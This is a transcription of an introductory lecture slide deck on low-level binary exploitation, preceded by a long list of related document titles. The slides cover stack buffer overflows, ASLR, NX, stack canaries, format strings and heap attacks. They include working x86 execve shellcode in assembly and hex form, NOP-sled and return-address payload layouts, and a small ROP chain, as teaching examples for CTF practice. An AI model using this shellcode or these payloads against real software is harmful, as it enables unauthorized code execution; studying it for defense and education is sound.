Biography. Background

Similar documents
From Over ow to Shell

This time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES

Università Ca Foscari Venezia

Practical Malware Analysis

This is an example C code used to try out our codes, there several ways to write this but they works out all the same.

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

Writing Exploits. Nethemba s.r.o.

Function Call Convention

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated

Return Oriented Programming

Buffer Overflow Vulnerability

ROP It Like It s Hot!

Advanced Buffer Overflow

Return-orientated Programming

Is stack overflow still a problem?

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP

Lecture 08 Control-flow Hijacking Defenses

ISA564 SECURITY LAB. Shellcode. George Mason University

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

1 Recommended Readings

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated

Security Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40

String Oriented Programming Exploring Format String Attacks. Mathias Payer

Buffer Overflow Vulnerability Lab Due: September 06, 2018, Thursday (Noon) Submit your lab report through to

Advanced Security for Systems Engineering VO 05: Advanced Attacks on Applications 2

Program Exploitation Intro

CSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko

CSC 405 Computer Security Stack Canaries & ASLR

CS 241 Honors Security

Advanced Buffer Overflow

20: Exploits and Containment

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.

Buffer Overflow Vulnerability Lab

1 Lab Overview. 2 Resources Required. CSC 666 Lab #11 Buffer Overflow November 29, 2012

Secure Systems Engineering

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux

Architecture-level Security Vulnerabilities

Buffer Overflow & Format Strings

CS4264 Programming Assignment 1 Buffer Overflow Vulnerability Due 02/21/2018 at 5:00 PM EST Submit through CANVAS

Return oriented programming

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call

Control Hijacking Attacks

Reverse Engineering II: Basics. Gergely Erdélyi Senior Antivirus Researcher

Buffer Overflow Attack

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

Hacking Blind. Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh. Stanford University

Assembly Language: Function Calls

Buffer Overflows Defending against arbitrary code insertion and execution

Assembly Language: Function Calls" Goals of this Lecture"

Module: Return-oriented Programming. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security

The Geometry of Innocent Flesh on the Bone

CS 161 Computer Security

Exploits and gdb. Tutorial 5

Buffer-Overflow Attacks on the Stack

CSE 565 Computer Security Fall 2018

CSE 127: Computer Security. Memory Integrity. Kirill Levchenko

Assembly Language: Function Calls" Goals of this Lecture"

Architecture-level Security Vulnerabilities. Julian Stecklina

buffer overflow exploitation

Assembly Language: Function Calls. Goals of this Lecture. Function Call Problems

Introduction to Reverse Engineering. Alan Padilla, Ricardo Alanis, Stephen Ballenger, Luke Castro, Jake Rawlins

CMPSC 497 Buffer Overflow Vulnerabilities

Countermeasures in Modern Operating Systems. Yves Younan, Vulnerability Research Team (VRT)

Lecture 10 Return-oriented programming. Stephen Checkoway University of Illinois at Chicago Based on slides by Bailey, Brumley, and Miller

Software Vulnerabilities August 31, 2011 / CS261 Computer Security

CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING

Intro to x86 Binaries. From ASM to exploit

Reverse Engineering II: The Basics

CMSC 313 Lecture 12. Project 3 Questions. How C functions pass parameters. UMBC, CMSC313, Richard Chang

Exercise 6: Buffer Overflow and return-into-libc Attacks

Secure Programming Lecture 3: Memory Corruption I (Stack Overflows)

4. Jump to *RA 4. StackGuard 5. Execute code 5. Instruction Set Randomization 6. Make system call 6. System call Randomization

U23 - Binary Exploitation

Lecture 09 Code reuse attacks. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017

The IA-32 Stack and Function Calls. CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta

Lecture 2 Assembly Language

SYSTEM CALL IMPLEMENTATION. CS124 Operating Systems Fall , Lecture 14

2 Resources Required. 3 Assignment Tasks. 3.1 Initial setup

Topics. What is a Buffer Overflow? Buffer Overflows

Buffer-Overflow Attacks on the Stack

Inject malicious code Call any library functions Modify the original code

Project 4: Application Security

Linux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.

CSC 2400: Computer Systems. Using the Stack for Function Calls

CS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly

CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR

x86 assembly CS449 Fall 2017

Basic Buffer Overflows

CSC 8400: Computer Systems. Using the Stack for Function Calls

Buffer Overflow and Protection Technology. Department of Computer Science,

Security and Privacy in Computer Systems. Lecture 5: Application Program Security

Rev101. spritzers - CTF team. spritz.math.unipd.it/spritzers.html

Other array problems. Integer overflow. Outline. Integer overflow example. Signed and unsigned

EECE.3170: Microprocessor Systems Design I Summer 2017 Homework 4 Solution

CSE 509: Computer Security

Transcription:

From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28

Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com Twitter: @zetatwo 2 / 28

Agenda 1. 2. Stack based exploitation 3. Protections and bypasses 4. Heap based explotation 5. Next steps 3 / 28

Who are you? Programmer Security interested Low-level language C, C++ Basic OS 4 / 28

What is an exploit? Unintended behaviour State machine Initial state Reachable state Invalid state Exploit Invalid state "Dangerous" subset Vulnerability Unintended transition (bug) Leading to an exploit 5 / 28

A note on data Bits, groups of bits nibble, byte, word, dword, qword Integer, text, code, addresses 65 66 67 68, "ABCD", inc ecx; inc edx; inc ebx; inc esp, 0x44434241 Same data, different operation Context Endianess, little vs big Little: 0x44332211 = 0x11 0x22 0x33 0x44 Big: 0x44332211 = 0x44 0x33 0x22 0x11 6 / 28

Where are we? Physics Circuits Machine code <-- You are here Assembler Low-level code: C, Rust Mid-level code: Java, C# High-level code: Python, JS 7 / 28

x86 architecture 101 Virtual memory Stack, heap, code 8 / 28

x86 architecture 101 Virtual memory Stack, heap, code General purpose EAX, EBX, ECX, EDX Special purpose EIP, EBP, ESP 9 / 28

Calling convention Architecture specific x86, 32 bit call 0xDEADBEEF... push eip+5 jmp 0xDEADBEEF ret pop eip args in reverse order f(a,b) push b push a call f base pointer 10 / 28

Calling convention Architecture specific x86, 32 bit call 0xDEADBEEF = push eip; jmp 0xDEADBEEF ret = pop eip args in reverse order base pointer 11 / 28

Stack bu er over ow Unchecked write Overwrite adjacent memory Overwrite return address void vuln() { int local1; char buf[16]; fgets(buf); } [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] [AAAABBBBCCCCDDDD][EEEE][FFFF][GGGG]\0... Program received signal SIGSEGV, Segmentation fault. 0x47474747 in example1 () 12 / 28

Shellcode xor push push push mov push push mov mov int Code that launches a shell One of the general goals %eax,%eax %eax $0x68732f2f ; "//sh" $0x6e69622f ; "/bin", "/bin//sh" %esp,%ebx %eax %ebx %esp,%ecx $0xb,%al ; execve $0x80 ; syscall "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 13 / 28

Stack bu er over ow (-96) Unchecked write Overwrite adjacent memory Overwrite return address With shellcode address void vuln() { int local1; char buf[16]; fgets(buf); } [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0xbffffdb4: [31C050682F2F7368682F62696E89E350][5389E1B0][0BCD8000][0xbffffdb4]\0... $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 14 / 28

Shellcode placement Shellcode can be placed anywhere void vuln() { int local1; char buf[12]; fgets(buf); } [buf (12 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0xbffffdb4: [AAAABBBBCCCCDDDD][EEEE][FFFF][0xbffffdd0]31C050682F2F7368682F62696E89E3505389E1B00BCD8000 $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 15 / 28

Shellcode placement Shellcode can be placed anywhere Don't need exact location NOP creates margin nop = 0x90 void vuln() { int local1; char buf[12]; fgets(buf); } [buf (12 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0xbffffdb4: [AAAABBBBCCCCDDDD][EEEE][FFFF][0xbffffdd0] 90909090909090909031C050682F2F7368682F62696E89E3505389E1B00BCD8000 $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 16 / 28

Protection: ASLR (-01) Base of stack random Code still static Location unkown Gadget 0x4000104A: jmp esp [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0x????????: [31C050682F2F7368682F62696E89E350][5389E1B0][0BCD8000][0x4000104A] $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 17 / 28

Protection: NX/DEP (-97) Random stack, static code Stack not executable, unkown location Gadgets Return-oriented programming 0x4000104A:... pop eax ret 0x4000106A:... pop ebx pop ecx ret [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][return address (4 bytes)] 0x????????: [AAAA...DDDD][EEEE][FFFF][0x4000104A][0xDEADBEEF][0x4000106A][0xCAFEBABE][0xFEEDF00D] eax = 0xDEADBEEF ebx = 0xCAFEBABE ecx = 0xFEEDF00D 18 / 28

Protection: StackGuard (-98) Prevent the overflow Canary, secret value Controlled crash void vuln() { int local1; char buf[12]; fgets(buf); } void vuln() { push_stack_cookie(); // Compiler int local1; char buf[12]; fgets(buf); check_stack_cookie(); // Compiler } SECRET = 0xfe481ac9 [buf (16 bytes)][local1 (4 bytes)][secret][saved bp (4 bytes)][ret address (4 bytes)] [AAAA...DDDD][EEEE][FFFF][GGGG][0x4000104A] 0x464646466!= 0xfe481ac9 * stack smashing detected :./a.out terminated ======= Backtrace: ========= /lib/i386-linux-gnu/libc-2.27.so ( fortify_fail+0x48) Aborted* 19 / 28

Other topics Format string vulnerability GOT, PLT Protection: RELRO EBP overwrite Create a new fake stack Partial overwrites 0x44434241 = 0x41 0x42 0x43 0x44 0xFF 0x42 0x43 0x44 = 0x444342FF Protection: Control-flow integrity (2014) Bypass: JIT Protection: PAC (2017) Bypass: TBA 20 / 28

Format string vulnerability int printf ( const char * format,... ); printf("name: %s, age: %d", name, age); // Ok printf(name); // Vulnerable Variable number of arguments Controlled by format string EBP+4*(i+1) Read direct: %x Read indirect: %s Write: %n Copy: %0*x Skip: %4$08x 21 / 28

Base pointer overwrite Fake stack Control local variables Absolute overwrite Partial overwrite 22 / 28

Other topics Format string vulnerability GOT, PLT Protection: RELRO EBP overwrite Create a new fake stack Partial overwrites 0x44434241 = 0x41 0x42 0x43 0x44 0xFF 0x42 0x43 0x44 = 0x444342FF Protection: Control-flow integrity (2014) Bypass: JIT Protection: PAC (2017) Bypass: TBA 23 / 28

Heap exploitation A refresher on memory Physical Virtual Pages Memory allocator libc (malloc/free) other custom 24 / 28

Heap corruption: application layer Heap overflow Use after free Type confusion Heap exploitation 25 / 28

Heap corruption: memory allocator Re-linking Double free Heap exploitation 26 / 28

Heap exploitation Next steps Want try it out? Capture the Flag, CTF https://ctftime.org https://capturetheflag.withgoogle.com Wargames https://picoctf.com http://pwnable.kr https://overthewire.org YouTube LiveOverflow Gynvael Coldwind MurmusCTF ZetaTwo Tools python + pwntools gdb + pwndbg radare2, IDA, binary ninja Educational https://github.com/rpisec/mbe https://github.com/shellphish/how2heap 27 / 28

Questions? 28 / 28

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback